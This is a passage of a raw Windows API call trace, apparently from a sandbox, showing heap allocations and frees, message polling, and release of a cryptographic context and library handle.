hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0223.302] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0223.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0223.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.304] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0223.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0223.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0223.306] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0223.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0223.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.306] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0223.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0223.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0223.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.307] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.308] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0223.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0223.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.309] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0223.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.309] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.309] FreeLibrary (hLibModule=0x756e0000) returned 1 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0223.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0223.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0223.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.310] CloseHandle (hObject=0x2d0) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0223.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: 